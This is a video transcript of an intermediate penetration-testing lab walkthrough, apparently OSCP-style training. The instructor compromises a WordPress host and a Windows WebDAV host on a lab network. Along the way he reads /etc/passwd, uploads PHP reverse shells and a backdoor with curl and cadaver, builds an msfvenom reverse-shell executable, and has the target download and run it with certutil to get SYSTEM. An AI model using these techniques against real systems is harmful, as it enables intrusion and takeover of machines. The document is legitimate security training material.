Web Application Lab Walkthrough

Difficulty
Intermediate
Video Transcription
00:01
Welcome to the Web application lab walkthrough.
00:07
So we have two hosts here. One is a Bitnami WordPress stack, which is a Linux host,
00:14
and the other is a Windows host.
00:16
And like I told you before, you need to go to wpscan.com and get an API token
00:23
to scan this Bitnami WordPress site. Of course you can use nmap to scan these, but since this is a web attack lab, you can be pretty sure it's either on port 80 or 443.
00:36
So we go to this site and we notice it's in the wordpress directory. That becomes important when we use WPScan, so we can see that it's a WordPress site.
00:47
So what I'll do is I'll use WPScan.
00:52
--url http://192.168.1.50/wordpress. Make sure you specify that directory, otherwise it's not gonna work.
01:06
Then you can do --api-token= and put your API token, and start your scan.
01:15
Now you're gonna get a lot of information back, and sometimes it's not that you have too little information, it's that you have too much information that comes back.
01:25
You'll see the themes come back with a lot of information.
01:29
So you'll see that a config backup is identified here. If you actually go to this site,
01:34
you might not see anything, but if you view the page source, here's a whole bunch of good information that you can see about the configuration of this WordPress site.
01:45
But is that going to get us a shell? Probably not.
01:48
So let me start looking at the vulnerabilities that were identified. I actually made this box, so hopefully you like it. And again, it's not too little information, it's too much information, so you have to kind of pick
02:02
out of these three vulnerabilities: unauthenticated file inclusion,
02:07
authenticated SQL injection,
02:08
and this upload arbitrary code execution, or arbitrary file upload. Which one is most important? And this is where your hacker senses have to kick in.
02:17
So out of all these vulnerabilities, what was most interesting to me is the arbitrary file upload.
02:23
The SQL injection, if you look at the PoC,
02:29
it will give you a sqlmap PoC here.
02:32
I kind of threw that in there as a trick. I mean, you can use this if you want, but of course in the OSCP you can't use this. And the other thing is, as I said, the people that write this might not give you a lot of information. This will drop you into a SQL shell. So it will just be sitting there staring at you, and if you don't know how to write SQL statements, you won't know what to do.
02:52
So understand what all this means. This is a lot of information to give you in this exploitation example.
03:00
So if you want to use this, go ahead and research it.
03:02
Also, this unauthenticated file inclusion.
03:08
This is interesting.
03:13
And we can read the /etc/passwd file.
03:21
Let's go ahead and paste that.
03:25
So we can read the /etc/passwd file. We could read a bunch of files.
03:30
But again, my goal is to get a shell on this box.
03:34
So if I go back and look,
03:37
I did this on purpose here.
03:38
So if you look at the arbitrary file upload, it's actually two exploits on Exploit-DB. One is a Metasploit module. That's fun.
03:49
And the other should be a PHP script. There's two PHP scripts, there's this one and this one. And that's why I go back to being able to read these examples.
04:02
So this is where we have to ask ourselves, am I going to waste a Metasploit module? If you actually look at the code,
04:09
it's making a curl request.
04:12
You could do this from the command line, and I will show you how easy this is. You don't even need to use the PHP.
04:17
So what I can do here is I will open up another shell. I'm gonna copy /usr/share/webshells/php/php-reverse-shell.php here, and I'm going to rename it to shell.php just to make it easy.
04:50
And of course this is the pentestmonkey shell, so I have to edit some things.
04:58
So I'm going to edit the IP to 192.168.1.5. I can leave that port.
05:15
And how do I curl this? Well, if I look at the PoC,
05:19
it tells me curl -F and
05:24
where I need to curl it to,
05:28
so I can do curl -F 'file=@shell.php' http://192.168.1.50/wordpress/ and then I need this here.
06:05
Then I hope I spelled everything right.
06:10
Single quotes for this.
06:19
I don't think I like that.
06:33
Uh, I have wordpress twice.
06:41
Okay.
06:42
So it tells us where our file should be. Of course, what we need to do now is set up a listener
06:47
on port 1234
06:50
and go to that site that it gave us. Of course, I might just cut off my shell right there.
06:59
netcat -lvp 1234
07:04
And let's go here.
07:12
Yes, I cut off the shell.
07:20
The joys of moving your shell around.
07:29
And now we can see I'm daemon, and I know it's kind of smushed, but the screen is small, and I apologize for the labs,
07:36
but we can see that
07:40
I am on this box now, 192.168.1.50. So I've successfully gotten onto the Linux box. So that's the way I would get onto it. You don't need to use a Metasploit module. All you need is WPScan, and to figure out from all that information overload
07:57
what the vital information is. So that's just being able to look at these proofs of concept
08:03
and figuring out from here, do I need to use Metasploit? You could use Metasploit and do this, but you just wasted a module, and I wouldn't do that when all you need to do is a simple curl request, which you can understand by looking at the PHP here. If you don't understand it, you know, just take a look and Google all this and figure it out.
08:22
That's how I figured it out, was Googling,
08:24
and it basically came down to a curl request, so that's how easy it is
08:31
for that, and I made it that way on purpose.
08:33
So now that we have a shell on the Linux box, I will close this out. So we've successfully completed one task.
08:45
So now let's move over to the Windows box.
08:52
So I like to do robots.txt
08:56
and see what I can find.
08:58
And I see there's a WebDAV directory.
09:03
Now if I go here, if I'm thinking WebDAV,
09:07
I'm thinking I can maybe use cadaver to get onto this. Now the problem is, if I use cadaver to put files
09:13
onto this, http://192.168.1.100/webdav, it's gonna ask me for a username and password. I don't know what that is.
09:28
So if I quit and I clear this, I can use dirb http://192.168.1.100/webdav.
09:41
Now you can specify extensions. I can do .txt or .asp or anything, but let's do .txt and see what we get.
10:01
.txt, maybe.
10:11
All right. So we found webdav.txt.
10:16
This gives us the username and password that we want.
10:22
So now what we can do is we can try to get a shell on here.
10:30
Now we can try to figure out the technology it uses. Does it use PHP? Does it use ASP? I can use whatweb 192.168.1.100.
10:52
Of course I like to use Wappalyzer, but we don't have that in the lab.
10:56
So I see it has PHP and Perl.
11:00
So if I have PHP on here,
11:01
I could probably upload that same web shell from pentestmonkey
11:07
onto this box with cadaver.
11:11
So let's go back and use cadaver
11:13
and now we know our credentials, right? Username wampp, password xampp. wampp, xampp. Awesome.
11:28
So we see index and webdav.txt. Of course, that was the file that gave us the information. What we can do now is put
11:35
shell.php on here.
11:37
ls. And of course what we can do now is, like before, split the terminal vertically and run netcat.
11:52
So now that we have a shell on here, I should be able to go to the shell.php,
12:01
and I see that there's an error here.
12:03
So why is this? That's a great question to ask yourself. If you read the code, this shell is for Linux, not for Windows.
12:16
So what I could do is put /usr/share/webshells/php/simple-backdoor.php.
12:26
So this is an interesting one.
12:41
simple-backdoor.php.
12:52
So we'll see usage. Now if I cat /etc/passwd, is that going to work? No. Why? Because this is a Windows box.
13:01
So an agnostic command that works on both is whoami, and I can see that I am NT AUTHORITY\SYSTEM.
13:07
Is this enough for a web shell?
13:09
Mm hmm. We can do better, right?
13:15
So what I can do is I can do an msfvenom payload. I'll do windows/shell_reverse_tcp, make LHOST us, LPORT 444, format is exe, shell.exe.
14:05
Okay,
14:07
So what I can do now is we can pull this. Quit. python3 -m http.server.
14:30
Okay, so it's very important, port 8000. So what am I trying to do here? I'm trying to get this .exe file and execute it so that I can get a shell on this box.
14:46
So I'll use certutil. certutil -urlcache -split. I'm doing this off the top of my head, so hopefully this is right. http://192.168.1.5:8000/shell.exe, output shell.exe, like that.
15:26
15:46
All right.
15:46
This is where I Google.
15:50
Yeah.
15:58
So -urlcache -f.
16:11
I don't need output,
16:15
and I can see that it got here.
16:23
Great.
16:26
So let's run dir and see if it's there.
16:30
We see it's there.
16:32
So now we need to set up msfconsole.
16:41
Actually, I don't need to set up msfconsole because,
16:45
well, you can if you want, right?
16:48
But my shell is shell_reverse_tcp.
16:53
So I could use netcat or I could use Metasploit.
17:03
So now if I go and run shell.exe,
17:14
what I should see now is I am on WebDAV here, I am SYSTEM, so that's great,
17:23
and I see we are on 192.168.1.100.
17:29
I can collapse this terminal here, this sub-terminal,
17:34
so there you go. So now I'm on the Windows box. So that's how you get a shell
17:40
on both boxes
17:44
and that's just basically from website enumeration
17:48
and knowing what tools you have. I don't think I mentioned cadaver at all in that web exploitation section.
17:55
So it's trying to think outside the box: if you see WebDAV, what should I do? And I believe that's covered in the PWK material. So I kind of wanted to throw a few curveballs in there for you so you could try harder and also try smarter. So hopefully you got shells on both boxes, and this walkthrough shows you how you can do that.